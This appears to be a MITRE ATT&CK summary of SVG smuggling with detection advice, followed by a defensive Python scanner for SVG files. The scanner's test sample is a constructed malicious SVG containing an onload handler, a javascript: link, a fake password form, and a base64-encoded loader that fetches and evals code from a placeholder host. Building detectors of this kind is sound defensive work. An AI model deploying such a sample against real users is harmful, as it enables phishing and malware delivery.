MITRE Technique [T1027.017] Obfuscated Files or Information: SVG Smuggling

[T1027.017] Obfuscated Files or Information: SVG Smuggling – SVG smuggling hides malicious JavaScript or encoded payloads inside seemingly harmless SVG image files so they pass content filters and look benign to users, enabling delivery of malware, credential theft, or redirects to malicious sites. #SVGSmuggling #DefenseEvasion

Keypoints

  • SVG files are XML-based images that can include embedded scripts, enabling attackers to hide active payloads in image files.
  • Attackers use SVGs to assemble or decode payloads in the victim browser, evading traditional attachment and content filters.
  • SVG smuggling can download additional malware or perform redirects without triggering usual file-type protections.
  • SVGs can host interactive elements like fake login forms or malicious buttons to capture credentials or trick users.
  • Detection requires inspecting file contents, monitoring browser script activity, and logging file creation and network requests.

Description:

  • Like a Trojan horse painted as a harmless picture, SVG smuggling hides active threats inside image files so they pass security checks and trick users into letting the threat inside.
  • Adversaries embed JavaScript or encoded data in the SVG's XML so that, when the file is opened in a browser or a document viewer, the script assembles, downloads, or runs a malicious payload. This gives stealthy delivery and execution of malware, credential theft, and redirects, and it matters because image files are widely trusted and often pass simple extension- or MIME-based filters.

Detection:

  • Scan SVG file contents for <script> elements, event-handler attributes such as onload and onclick, javascript: URIs, and suspicious embedded data URIs, using a static XML parser or custom YARA rules.
  • Monitor file creation logs and file system events for unexpected SVG writes in user directories with EDR tools; correlate with process parents for browser or document readers.
  • Inspect outbound HTTP/HTTPS requests from browsers and document viewers for suspicious downloads or exfiltration immediately after an SVG is opened.
  • Where the browser or EDR exposes script-execution telemetry, collect and review it in enterprise logging to catch runtime script execution originating from SVG files.
  • On email gateways and web proxies, do not rely on MIME type alone (a malicious SVG is still image/svg+xml); parse the content and block or quarantine SVGs that contain script elements, event handlers, or inline scripts, or strip those elements before delivery.
  • Watch for HTML/SVG smuggling chains by scanning embedded resources in emails, PDFs, and HTML for base64 blobs or long encoded strings that decode into scripts.
  • Reduce false positives by allowlisting known benign SVG sources and using heuristic thresholds for script complexity and external callbacks; validate detections with sandbox execution (headless browser) to confirm malicious behavior.
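The following Python scanner is an added example, not code from the ATT&CK page or from any tool it mentions. It implements the static checks listed under Detection (script elements, event-handler attributes, javascript: and non-image data: URIs, long base64 runs that decode to script, and a weak/strong split to limit false positives) and exercises them on two constructed SVGs: a plain image and a smuggling sample built the way the Description section outlines (an onload handler, a javascript: link, a foreignObject login form, and a script that decodes a base64 second stage). The indicator names, the base64 length threshold, the STRONG/WEAK policy and the hostnames example.invalid and phish.invalid are assumptions of this example.

```python
"""Static triage of SVG files for smuggling indicators (added example)."""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Attributes whose value a renderer treats as a URI (namespace stripped).
URI_ATTRS = {"href", "src", "action", "data"}
# Strings that rarely occur in a genuine image but are common in loaders.
SCRIPT_MARKERS = ("<script", "eval(", "atob(", "document.write", "fromCharCode",
                  "location.href", "location.replace", "fetch(", "XMLHttpRequest")
# Base64 runs long enough to plausibly carry a second stage; tune per corpus.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")
# Indicators that justify blocking on their own vs. ones that only merit review.
STRONG = {"script_element", "event_handler", "javascript_uri", "non_image_data_uri",
          "encoded_script", "parse_error", "raw_script_marker"}
WEAK = {"foreignObject", "embedded_html"}


def _local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def _decodes_to_script(blob):
    """True if a base64 run decodes to text containing a script marker."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
    except (binascii.Error, ValueError):
        return False
    lowered = text.lower()
    return any(m.lower() in lowered for m in SCRIPT_MARKERS)


def scan_svg(svg_text):
    """Return a list of (indicator, detail) tuples; empty means nothing found.

    Purely static: the file is parsed, never rendered. The stdlib expat parser
    does not fetch external entities; for hostile input at scale use defusedxml.
    """
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # Not well-formed XML but still carrying script markers usually means
        # the author is counting on a lenient renderer; flag rather than pass.
        findings.append(("parse_error", str(exc)))
        root = None

    if root is not None:
        for el in root.iter():                      # includes the root <svg>
            name = _local(el.tag)
            if name == "script":
                findings.append(("script_element", (el.text or "").strip()[:60]))
            elif name == "foreignObject":
                findings.append(("foreignObject", "non-SVG content embedded"))
            elif name in ("form", "input", "iframe", "embed", "object"):
                findings.append(("embedded_html", name))
            for attr, value in el.attrib.items():
                aname = _local(attr)
                if aname.startswith("on"):          # onload, onclick, onerror...
                    findings.append(("event_handler", f"{name}@{aname}={value[:60]}"))
                elif aname in URI_ATTRS:
                    v = value.strip().lower()
                    if v.startswith("javascript:"):
                        findings.append(("javascript_uri", value[:60]))
                    elif v.startswith("data:") and not v.startswith("data:image/"):
                        findings.append(("non_image_data_uri", value[:60]))
    else:
        for marker in SCRIPT_MARKERS:
            if marker.lower() in svg_text.lower():
                findings.append(("raw_script_marker", marker))

    # Raw-text pass: catches payloads the tree walk does not see (comments,
    # unknown elements, or a file that failed to parse at all).
    for blob in BASE64_RUN.findall(svg_text):
        if _decodes_to_script(blob):
            findings.append(("encoded_script", blob[:40] + "..."))
    return findings


def classify(svg_text):
    """Map findings to a gateway action: 'block', 'review' or 'allow'."""
    kinds = {kind for kind, _ in scan_svg(svg_text)}
    if kinds & STRONG:
        return "block"
    if kinds & WEAK:
        return "review"
    return "allow"


# Constructed samples (not real malware) used to exercise the scanner.
BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
              '<circle cx="50" cy="50" r="40" fill="steelblue"/></svg>')
# Second stage as an attacker would embed it: base64 of a fetch-and-eval loader.
_STAGE2 = base64.b64encode(
    b'fetch("https://example.invalid/stage2").then(function(r){return r.text()})'
    b'.then(function(t){eval(t)})').decode()
SMUGGLING_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">'
    '<rect width="300" height="120" fill="white"/>'
    '<a xlink:href="javascript:init()"><text x="20" y="60">Open document</text></a>'
    '<foreignObject width="300" height="120">'
    '<form xmlns="http://www.w3.org/1999/xhtml" action="https://phish.invalid/collect">'
    '<input name="password" type="password"/></form></foreignObject>'
    '<script type="text/javascript">function init(){eval(atob("' + _STAGE2 + '"));}'
    '</script></svg>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("smuggling", SMUGGLING_SVG)):
        print(label, classify(doc))
        for kind, detail in scan_svg(doc):
            print("  ", kind, detail)
```

Running the block prints "allow" for the plain circle and "block" for the smuggling sample, listing the onload handler, the javascript: link, the foreignObject and its form and input, the script element, and the decoded fetch-and-eval stage. A file that only contains a foreignObject with static XHTML text lands in "review" rather than "block", which is the false-positive control the last Detection bullet asks for; a file that is not even well-formed XML is blocked outright, since a genuine image has no reason to be malformed.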

Tactics:
Defense Evasion

Platforms:
Linux, Windows, macOS

Data Sources:
File: File Creation

Read More: https://attack.mitre.org/techniques/T1027/017